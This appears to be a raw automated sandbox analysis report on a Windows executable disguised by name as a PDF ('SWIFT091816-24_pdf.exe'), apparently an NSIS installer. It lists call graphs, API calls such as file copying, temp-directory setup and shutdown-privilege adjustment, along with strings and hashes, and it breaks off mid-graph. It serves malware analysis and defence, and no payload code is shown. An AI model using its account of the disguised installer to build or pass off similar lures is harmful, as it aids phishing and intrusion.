wsprintfW 4578->4586 4580 404b1b 4581 40140b 2 API calls 4580->4581 4582 404b24 4581->4582 4587 406055 lstrcpynW 4582->4587 4584 404b2b 4584->4560 4585->4578 4586->4580 4587->4584 4588 40242a 4599 402cc9 4588->4599 4590 402434 4591 402bbf 18 API calls 4590->4591 4592 40243d 4591->4592 4593 402448 RegQueryValueExW 4592->4593 4598 40281e 4592->4598 4594 40246e RegCloseKey 4593->4594 4595 402468 4593->4595 4594->4598 4595->4594 4603 405f9c wsprintfW 4595->4603 4600 402bbf 18 API calls 4599->4600 4601 402ce2 4600->4601 4602 402cf0 RegOpenKeyExW 4601->4602 4602->4590 4603->4594 5287 40422d lstrcpynW lstrlenW 5288 40172d 5289 402bbf 18 API calls 5288->5289 5290 401734 SearchPathW 5289->5290 5291 40174f 5290->5291 4604 404b30 GetDlgItem GetDlgItem 4605 404b82 7 API calls 4604->4605 4613 404d9b 4604->4613 4606 404c25 DeleteObject 4605->4606 4607 404c18 SendMessageW 4605->4607 4608 404c2e 4606->4608 4607->4606 4609 404c3d 4608->4609 4610 404c65 4608->4610 4611 406077 18 API calls 4609->4611 4614 404119 19 API calls 4610->4614 4617 404c47 SendMessageW SendMessageW 4611->4617 4612 404e60 4616 404e7f 4612->4616 4624 404e71 SendMessageW 4612->4624 4613->4612 4613->4616 4620 404dfb 4613->4620 4621 404c79 4614->4621 4615 404f2b 4618 404f35 SendMessageW 4615->4618 4619 404f3d 4615->4619 4616->4615 4622 405113 4616->4622 4627 404ed8 SendMessageW 4616->4627 4617->4608 4618->4619 4629 404f56 4619->4629 4630 404f4f ImageList_Destroy 4619->4630 4638 404f66 4619->4638 4625 404a7e 5 API calls 4620->4625 4626 404119 19 API calls 4621->4626 4623 404180 8 API calls 4622->4623 4628 405121 4623->4628 4624->4616 4641 404e0c 4625->4641 4642 404c87 4626->4642 4627->4622 4632 404eed SendMessageW 4627->4632 4633 404f5f GlobalFree 4629->4633 4629->4638 4630->4629 4631 4050d5 4631->4622 4636 4050e7 ShowWindow GetDlgItem ShowWindow 4631->4636 4635 404f00 4632->4635 4633->4638 4634 404d5c GetWindowLongW SetWindowLongW 4637 404d75 4634->4637 4643 404f11 SendMessageW 4635->4643 4636->4622 4639 404d93 4637->4639 4640 404d7b ShowWindow 4637->4640 4638->4631 4650 404afe 4 API calls 4638->4650 4654 404fa1 4638->4654 4661 40414e SendMessageW 4639->4661 4660 40414e SendMessageW 4640->4660 4641->4612 4642->4634 4644 404d56 4642->4644 4647 404cd7 SendMessageW 4642->4647 4648 404d13 SendMessageW 4642->4648 4649 404d24 SendMessageW 4642->4649 4643->4615 4644->4634 4644->4637 4647->4642 4648->4642 4649->4642 4650->4654 4651 404d8e 4651->4622 4652 4050ab InvalidateRect 4652->4631 4653 4050c1 4652->4653 4662 404a39 4653->4662 4655 404fcf SendMessageW 4654->4655 4656 404fe5 4654->4656 4655->4656 4656->4652 4657 405046 4656->4657 4659 405059 SendMessageW SendMessageW 4656->4659 4657->4659 4659->4656 4660->4651 4661->4613 4665 404970 4662->4665 4664 404a4e 4664->4631 4666 404989 4665->4666 4667 406077 18 API calls 4666->4667 4668 4049ed 4667->4668 4669 406077 18 API calls 4668->4669 4670 4049f8 4669->4670 4671 406077 18 API calls 4670->4671 4672 404a0e lstrlenW wsprintfW SetDlgItemTextW 4671->4672 4672->4664 5292 4045b4 5293 4045e0 5292->5293 5294 4045f1 5292->5294 5353 40577e GetDlgItemTextW 5293->5353 5296 4045fd GetDlgItem 5294->5296 5302 40465c 5294->5302 5298 404611 5296->5298 5297 4045eb 5300 4062e9 5 API calls 5297->5300 5301 404625 SetWindowTextW 5298->5301 5308 405ab4 4 API calls 5298->5308 5299 404740 5351 4048ef 5299->5351 5355 40577e GetDlgItemTextW 5299->5355 5300->5294 5304 404119 19 API calls 5301->5304 5302->5299 5305 406077 18 API calls 5302->5305 5302->5351 5309 404641 5304->5309 5310 4046d0 SHBrowseForFolderW 5305->5310 5306 404770 5311 405b11 18 API calls 5306->5311 5307 404180 8 API calls 5312 404903 5307->5312 5313 40461b 5308->5313 5314 404119 19 API calls 5309->5314 5310->5299 5315 4046e8 CoTaskMemFree 5310->5315 5316 404776 5311->5316 5313->5301 5319 405a09 3 API calls 5313->5319 5317 40464f 5314->5317 5318 405a09 3 API calls 5315->5318 5356 406055 lstrcpynW 5316->5356 5354 40414e SendMessageW 5317->5354 5321 4046f5 5318->5321 5319->5301 5324 40472c SetDlgItemTextW 5321->5324 5328 406077 18 API calls 5321->5328 5323 404655 5326 40642b 5 API calls 5323->5326 5324->5299 5325 40478d 5327 40642b 5 API calls 5325->5327 5326->5302 5336 404794 5327->5336 5329 404714 lstrcmpiW 5328->5329 5329->5324 5332 404725 lstrcatW 5329->5332 5330 4047d5 5357 406055 lstrcpynW 5330->5357 5332->5324 5333 4047dc 5334 405ab4 4 API calls 5333->5334 5335 4047e2 GetDiskFreeSpaceW 5334->5335 5339 404806 MulDiv 5335->5339 5340 40482d 5335->5340 5336->5330 5338 405a55 2 API calls 5336->5338 5336->5340 5338->5336 5339->5340 5341 40489e 5340->5341 5342 404a39 21 API calls 5340->5342 5343 4048c1 5341->5343 5345 40140b 2 API calls 5341->5345 5344 40488b 5342->5344 5358 40413b EnableWindow 5343->5358 5347 4048a0 SetDlgItemTextW 5344->5347 5348 404890 5344->5348 5345->5343 5347->5341 5350 404970 21 API calls 5348->5350 5349 4048dd 5349->5351 5359 404549 5349->5359 5350->5341 5351->5307 5353->5297 5354->5323 5355->5306 5356->5325 5357->5333 5358->5349 5360 404557 5359->5360 5361 40455c SendMessageW 5359->5361 5360->5361 5361->5351 5362 4027b4 5363 4027ba 5362->5363 5364 4027c2 FindClose 5363->5364 5365 402a4c 5363->5365 5364->5365 5366 4042b6 5367 4042ce 5366->5367 5373 4043e8 5366->5373 5374 404119 19 API calls 5367->5374 5368 404452 5369 404524 5368->5369 5370 40445c GetDlgItem 5368->5370 5377 404180 8 API calls 5369->5377 5371 4044e5 5370->5371 5372 404476 5370->5372 5371->5369 5379 4044f7 5371->5379 5372->5371 5378 40449c 6 API calls 5372->5378 5373->5368 5373->5369 5375 404423 GetDlgItem SendMessageW 5373->5375 5376 404335 5374->5376 5397 40413b EnableWindow 5375->5397 5381 404119 19 API calls 5376->5381 5388 40451f 5377->5388 5378->5371 5383 40450d 5379->5383 5384 4044fd SendMessageW 5379->5384 5382 404342 CheckDlgButton 5381->5382 5395 40413b EnableWindow 5382->5395 5387 404513 SendMessageW 5383->5387 5383->5388 5384->5383 5385 40444d 5389 404549 SendMessageW 5385->5389 5387->5388 5389->5368 5390 404360 GetDlgItem 5396 40414e SendMessageW 5390->5396 5392 404376 SendMessageW 5393 404393 GetSysColor 5392->5393 5394 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5392->5394 5393->5394 5394->5388 5395->5390 5396->5392 5397->5385 4695 401b37 4696 401b88 4695->4696 4701 401b44 4695->4701 4697 401bb2 GlobalAlloc 4696->4697 4698 401b8d 4696->4698 4699 406077 18 API calls 4697->4699 4711 402288 4698->4711 4716 406055 lstrcpynW 4698->4716 4703 401bcd 4699->4703 4700 406077 18 API calls 4704 402282 4700->4704 4701->4703 4705 401b5b 4701->4705 4703->4700 4703->4711 4708 40579a MessageBoxIndirectW 4704->4708 4714 406055 lstrcpynW 4705->4714 4706 401b9f GlobalFree 4706->4711 4708->4711 4709 401b6a 4715 406055 lstrcpynW 4709->4715 4712 401b79 4717 406055 lstrcpynW 4712->4717 4714->4709 4715->4712 4716->4706 4717->4711 5398 402537 5399 402562 5398->5399 5400 40254b 5398->5400 5402 402596 5399->5402 5403 402567 5399->5403 5401 402ba2 18 API calls 5400->5401 5410 402552 5401->5410 5405 402bbf 18 API calls 5402->5405 5404 402bbf 18 API calls 5403->5404 5406 40256e WideCharToMultiByte lstrlenA 5404->5406 5407 40259d lstrlenW 5405->5407 5406->5410 5407->5410 5408 4025e0 5409 4025ca 5409->5408 5411 405cdc WriteFile 5409->5411 5410->5408 5410->5409 5412 405d0b 5 API calls 5410->5412 5411->5408 5412->5409 5413 4014b8 5414 4014be 5413->5414 5415 401389 2 API calls 5414->5415 5416 4014c6 5415->5416 4724 4015b9 4725 402bbf 18 API calls 4724->4725 4726 4015c0 4725->4726 4727 405ab4 4 API calls 4726->4727 4737 4015c9 4727->4737 4728 401629 4730 40165b 4728->4730 4731 40162e 4728->4731 4729 405a36 CharNextW 4729->4737 4734 401423 25 API calls 4730->4734 4732 401423 25 API calls 4731->4732 4733 401635 4732->4733 4743 406055 lstrcpynW 4733->4743 4741 401653 4734->4741 4735 405700 2 API calls 4735->4737 4737->4728 4737->4729 4737->4735 4738 40571d 5 API calls 4737->4738 4740 40160f GetFileAttributesW 4737->4740 4742 405683 4 API calls 4737->4742 4738->4737 4739 401642 SetCurrentDirectoryW 4739->4741 4740->4737 4742->4737 4743->4739 5417 10002a7f 5418 10002a97 5417->5418 5419 1000158f 2 API calls 5418->5419 5420 10002ab2 5419->5420

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 8 4032de 1->8 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 8->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 26 4033b1-4033b7 24->26 27 4033aa-4033af 24->27 34 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->34 35 403526-403540 DeleteFileW call 402dee 25->35 29 4033b9-4033bd 26->29 30 4033be-4033c2 26->30 27->26 27->27 29->30 32 403480-40348d call 405a36 30->32 33 4033c8-4033ce 30->33 50 403491-403497 32->50 51 40348f-403490 32->51 39 4033d0-4033d7 33->39 40 4033e8-403421 33->40 34->35 48 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 34->48 52 4035f1-403602 call 4037c4 OleUninitialize 35->52 53 403546-40354c 35->53 44 4033d9-4033dc 39->44 45 4033de 39->45 46 403423-403428 40->46 47 40343e-403478 40->47 44->40 44->45 45->40 46->47 54 40342a-403432 46->54 47->32 49 40347a-40347e 47->49 48->35 48->52 49->32 56 40349f-4034ad call 406055 49->56 50->24 57 40349d 50->57 51->50 69 403728-40372e 52->69 70 403608-403618 call 40579a ExitProcess 52->70 58 4035e1-4035e8 call 40389e 53->58 59 403552-40355d call 405a36 53->59 61 403434-403437 54->61 62 403439 54->62 64 4034b2 56->64 57->64 72 4035ed 58->72 76 4035ab-4035b5 59->76 77 40355f-403594 59->77 61->47 61->62 62->47 64->25 74 403730-403746 GetCurrentProcess OpenProcessToken 69->74 75 4037ac-4037b4 69->75 72->52 83 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 74->83 84 40377c-40378a call 40642b 74->84 78 4037b6 75->78 79 4037ba-4037be ExitProcess 75->79 81 4035b7-4035c5 call 405b11 76->81 82 40361e-403632 call 40571d lstrcatW 76->82 85 403596-40359a 77->85 78->79 81->52 95 4035c7-4035dd call 406055 * 2 81->95 96 403634-40363a lstrcatW 82->96 97 40363f-403659 lstrcatW lstrcmpiW 82->97 83->84 98 403798-4037a3 ExitWindowsEx 84->98 99 40378c-403796 84->99 89 4035a3-4035a7 85->89 90 40359c-4035a1 85->90 89->85 91 4035a9 89->91 90->89 90->91 91->76 95->58 96->97 97->52 101 40365b-40365e 97->101 98->75 102 4037a5-4037a7 call 40140b 98->102 99->98 99->102 104 403660-403665 call 405683 101->104 105 403667 call 405700 101->105 102->75 113 40366c-40367a SetCurrentDirectoryW 104->113 105->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 124 40371c-403723 call 405ef6 122->124 123->122 125 4036e5-403705 call 405ef6 call 406077 call 405735 123->125 124->52 125->122 134 403707-40370e CloseHandle 125->134 134->122
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                                                • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                                • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,?,00000000), ref: 0040333B
                                                                                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe",00000000), ref: 00403363
                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe",?), ref: 0040338A
                                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                                • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe",00000000,?), ref: 0040362B
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe",00000000,?), ref: 0040363A
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe",00000000,?), ref: 00403645
                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe",00000000,?), ref: 00403651
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,0042AA28,00000001), ref: 004036DB
                                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 00403737
                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                • String ID: "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SWIFT091816-24_pdf.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                • API String ID: 3586999533-572181032
                                                                                                                                • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 142 404c2e-404c36 138->142 139->138 143 404dbb-404dc4 140->143 141->143 144 404c38-404c3b 142->144 145 404c5f-404c63 142->145 146 404dc6-404dc9 143->146 147 404dcf-404dd5 143->147 148 404c40-404c5d call 406077 SendMessageW * 2 144->148 149 404c3d 144->149 145->142 153 404c65-404c91 call 404119 * 2 145->153 146->147 150 404eb3-404eba 146->150 151 404de4-404deb 147->151 152 404dd7-404dde 147->152 148->145 149->148 158 404f2b-404f33 150->158 159 404ebc-404ec2 150->159 155 404e60-404e63 151->155 156 404ded-404df0 151->156 152->150 152->151 192 404c97-404c9d 153->192 193 404d5c-404d6f GetWindowLongW SetWindowLongW 153->193 155->150 160 404e65-404e6f 155->160 164 404df2-404df9 156->164 165 404dfb-404e10 call 404a7e 156->165 162 404f35-404f3b SendMessageW 158->162 163 404f3d-404f44 158->163 167 405113-405125 call 404180 159->167 168 404ec8-404ed2 159->168 170 404e71-404e7d SendMessageW 160->170 171 404e7f-404e89 160->171 162->163 172 404f46-404f4d 163->172 173 404f78-404f7f 163->173 164->155 164->165 165->155 191 404e12-404e23 165->191 168->167 176 404ed8-404ee7 SendMessageW 168->176 170->171 171->150 178 404e8b-404e95 171->178 179 404f56-404f5d 172->179 180 404f4f-404f50 ImageList_Destroy 172->180 183 4050d5-4050dc 173->183 184 404f85-404f91 call 4011ef 173->184 176->167 185 404eed-404efe SendMessageW 176->185 187 404ea6-404eb0 178->187 188 404e97-404ea4 178->188 189 404f66-404f72 179->189 190 404f5f-404f60 GlobalFree 179->190 180->179 183->167 186 4050de-4050e5 183->186 203 404fa1-404fa4 184->203 204 404f93-404f96 184->204 195 404f00-404f06 185->195 196 404f08-404f0a 185->196 186->167 198 4050e7-405111 ShowWindow GetDlgItem ShowWindow 186->198 187->150 188->150 189->173 190->189 191->155 200 404e25-404e27 191->200 201 404ca0-404ca7 192->201 199 404d75-404d79 193->199 195->196 197 404f0b-404f24 call 401299 SendMessageW 195->197 196->197 197->158 198->167 206 404d93-404d9b call 40414e 199->206 207 404d7b-404d8e ShowWindow call 40414e 199->207 208 404e29-404e30 200->208 209 404e3a 200->209 210 404d3d-404d50 201->210 211 404cad-404cd5 201->211 217 404fe5-405009 call 4011ef 203->217 218 404fa6-404fbf call 4012e2 call 401299 203->218 213 404f98 204->213 214 404f99-404f9c call 404afe 204->214 206->137 207->167 221 404e32-404e34 208->221 222 404e36-404e38 208->222 212 404e3d-404e59 call 40117d 209->212 210->201 216 404d56-404d5a 210->216 223 404cd7-404d0d SendMessageW 211->223 224 404d0f-404d11 211->224 212->155 213->214 214->203 216->193 216->199 236 4050ab-4050bf InvalidateRect 217->236 237 40500f 217->237 245 404fc1-404fc7 218->245 246 404fcf-404fde SendMessageW 218->246 221->212 222->212 223->210 226 404d13-404d22 SendMessageW 224->226 227 404d24-404d3a SendMessageW 224->227 226->210 227->210 236->183 241 4050c1-4050d0 call 404a51 call 404a39 236->241 239 405012-40501d 237->239 242 405093-4050a5 239->242 243 40501f-40502e 239->243 241->183 242->236 242->239 247 405030-40503d 243->247 248 405041-405044 243->248 249 404fc9 245->249 250 404fca-404fcd 245->250 246->217 247->248 252 405046-405049 248->252 253 40504b-405054 248->253 249->250 250->245 250->246 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->242 256->255
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00404B9D
                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                • SetWindowLongW.USER32(?,?,00405128), ref: 00404BC9
                                                                                                                                • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C23
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                • GetWindowLongW.USER32(?,?), ref: 00404D61
                                                                                                                                • SetWindowLongW.USER32(?,?,00000000), ref: 00404D6F
                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404EF7
                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,?), ref: 00404F1B
                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                • String ID: $M$N
                                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                                • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                                • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 263 403c70-403c7d SetWindowPos 260->263 264 403c83-403c86 260->264 266 403e47-403e4c call 404165 261->266 267 403e09-403e0c 261->267 262->261 263->264 269 403ca0-403ca6 264->269 270 403c88-403c9a ShowWindow 264->270 275 403e51-403e6c 266->275 272 403e0e-403e19 call 401389 267->272 273 403e3f-403e41 267->273 276 403cc2-403cc5 269->276 277 403ca8-403cbd DestroyWindow 269->277 270->269 272->273 288 403e1b-403e3a SendMessageW 272->288 273->266 274 4040e6 273->274 282 4040e8-4040ef 274->282 280 403e75-403e7b 275->280 281 403e6e-403e70 call 40140b 275->281 285 403cc7-403cd3 SetWindowLongW 276->285 286 403cd8-403cde 276->286 283 4040c3-4040c9 277->283 291 403e81-403e8c 280->291 292 4040a4-4040bd DestroyWindow EndDialog 280->292 281->280 283->274 289 4040cb-4040d1 283->289 285->282 293 403d81-403d8f call 404180 286->293 294 403ce4-403cf5 GetDlgItem 286->294 288->282 289->274 296 4040d3-4040dc ShowWindow 289->296 291->292 297 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 291->297 292->283 293->282 298 403d14-403d17 294->298 299 403cf7-403d0e SendMessageW IsWindowEnabled 294->299 296->274 327 403ee1-403ee6 297->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 297->328 300 403d19-403d1a 298->300 301 403d1c-403d1f 298->301 299->274 299->298 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->293 308 403d68-403d7b SendMessageW 305->308 309 403d29-403d2b 305->309 306->308 310 403d34-403d3a 306->310 308->293 309->304 313 403d51-403d5a call 40140b 310->313 314 403d3c-403d42 call 40140b 310->314 